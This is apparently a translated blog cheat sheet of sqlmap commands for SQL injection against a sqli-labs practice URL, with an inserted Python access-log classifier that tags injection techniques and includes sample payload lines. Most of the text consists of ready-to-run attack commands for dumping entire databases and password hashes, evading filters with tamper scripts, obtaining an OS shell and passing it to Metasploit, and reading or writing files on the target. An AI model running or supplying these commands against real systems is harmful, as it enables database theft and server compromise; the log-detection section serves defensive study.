Sqlmap injection common commands

sqlmap -r http.txt #http.txt is the HTTP request we captured
sqlmap -r http.txt -p username #Specify the parameter: when there are multiple parameters and you know that the username parameter has a SQL injection vulnerability, use -p to specify the parameter to test
sqlmap -u "http://www.xx.com/username/admin*" #If we already know that admin is the injection point, we can add a * after it so that sqlmap injects there
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" #Detect whether the URL is vulnerable
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --cookie="Grabbed cookie" #When the website requires login, detect whether the URL is vulnerable
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --data="uname=admin&passwd=admin&submit=Submit" #Capture the data submitted by POST and fill it in
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --users #View all users in the database
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --passwords #View the passwords of the database users
Sometimes you can't get the passwords with --passwords; in that case you can try:
-D mysql -T user -C host,user,password --dump #when MySQL<5.7
-D mysql -T user -C host,user,authentication_string --dump #when MySQL>=5.7
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-user #View the current user
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --is-dba #Check whether the current user has administrator rights
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --roles #List all database administrator roles; only applicable to Oracle databases
 
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs #Enumerate all databases
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tables #Enumerate all tables
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --columns #Enumerate all columns in the database
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db #View the current database
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables #Enumerate all tables in the database security
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns #Enumerate all columns of the users table in the database security
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump #Dump all data in the username column of the users table in the database security
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump --start 1 --stop 100 #Dump the first 100 entries in the username column of the users table in the database security
 
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all #Dump all data in the users table in the database security
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all #Dump all data in the database security
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all #Dump all data in the database
 
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --tamper=space2comment.py #Specify a tamper script to get past filtering; this one uses /**/ instead of spaces
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --level=5 --risk=3 #Detection level 5 and risk level 3, both the highest. When level=2, cookie injection will be tested. When level=3, user-agent/referer injection will be tested.
sqlmap -u "http://192.168.10.1/sqli/Less-1/?id=1" --sql-shell #Execute specified SQL statements
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-shell/--os-cmd #Run --os-shell to obtain access to the target server
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --os-pwn #Run --os-pwn to pass the access obtained on the target over to MSF
 
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-read "c:/test.txt" #Read the test.txt file on the C drive of the target server
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-write test.txt --file-dest "e:/hack.txt" #Upload the local test.txt file to the E drive of the target server under the name hack.txt
 
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --dbms="MySQL" #Specify that the database is MySQL
Other databases: Altibase, Apache Derby, CrateDB, Cubrid, Firebird, FrontBase, H2, HSQLDB, IBM DB2, Informix, InterSystems Cache, Mckoi, Microsoft Access, Microsoft SQL Server, MimerSQL, MonetDB, MySQL, Oracle, PostgreSQL, Presto, SAP MaxDB, SQLite, Sybase, Vertica, eXtremeDB
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --random-agent #Use an arbitrary User-Agent for the test
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --proxy="http://127.0.0.1:8080" #Specify a proxy
If requests time out when testing HTTPS websites, the parameters --delay=3 --force-ssl can be used
sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --technique T #Specify time-delay injection. This parameter specifies the detection techniques sqlmap uses; by default it tests all of them, and they can also be specified manually.
The supported detection methods are as follows:
  B: Boolean-based blind SQL injection (Boolean injection)
  E: Error-based SQL injection (error-based injection)
  U: UNION query SQL injection (union query injection)
  S: Stacked queries SQL injection (multi-statement query injection)
  T: Time-based blind SQL injection (time-delay injection)
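
Seen from the defending side, the five technique letters above leave different traces in a web access log. The following is an added example, not part of the original post and not sqlmap code: a small Python classifier that tags log lines by technique. The regexes, the log layout (combined log format) and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures keyed by sqlmap's --technique letters. The regexes are
# illustrative assumptions for this example, not sqlmap's payload list.
SIGNATURES = {
    "B": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "E": re.compile(r"\b(extractvalue|updatexml)\s*\(|floor\s*\(\s*rand\s*\(", re.I),
    "U": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "S": re.compile(r";\s*(select|insert|update|delete|drop|declare)\b", re.I),
    "T": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I),
}
# Combined log format: request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def classify(line):
    """Return detection details for one access-log line, or None if unparsable."""
    m = LOG_RE.search(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path").partition("?")[2])
    # Inline comments stand in for spaces after a space2comment-style tamper,
    # so turn them back into spaces before matching.
    text = re.sub(r"/\*.*?\*/", " ", decoded)
    return {
        "techniques": [t for t, rx in SIGNATURES.items() if rx.search(text)],
        # Only reliable when the default User-Agent was left in place;
        # --random-agent removes it, so payload matching must not depend on it.
        "sqlmap_ua": m.group("ua").lower().startswith("sqlmap/"),
        "comment_padding": "/**/" in decoded,
    }

# Constructed sample lines (addresses from the documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2021:10:00:01 +0000] "GET /sqli/Less-1/?id=1%20AND%205=5 HTTP/1.1" 200 512 "-" "sqlmap/1.5#stable (http://sqlmap.org)"',
    '192.0.2.10 - - [10/Mar/2021:10:00:02 +0000] "GET /sqli/Less-1/?id=1%27/**/AND/**/SLEEP(5)--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.10 - - [10/Mar/2021:10:00:03 +0000] "GET /sqli/Less-1/?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Mar/2021:10:00:04 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry))
```

Matching on the decoded, comment-stripped query rather than on the User-Agent is what keeps the second sample line detectable.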
  
sqlmap -d "mysql://root:[email protected]:3306/mysql" --os-shell #Connect directly when the website's account and password are known
 
-v3 #Output verbosity; the maximum, 5, displays the request and response packets
--threads 5 #Specify the number of threads
--fresh-queries #Clear the cache
--flush-session #Empty the session and redo the injection
--batch #Use the default answer for all interactive prompts
--random-agent #Arbitrary HTTP header
--tamper base64encode #Base64-encode the submitted data
--referer http://www.baidu.com #Forge the Referer field
 
--keep-alive #Keep the connection alive; use this parameter when you get the error "[CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)"

Origin blog.csdn.net/guo15890025019/article/details/115022431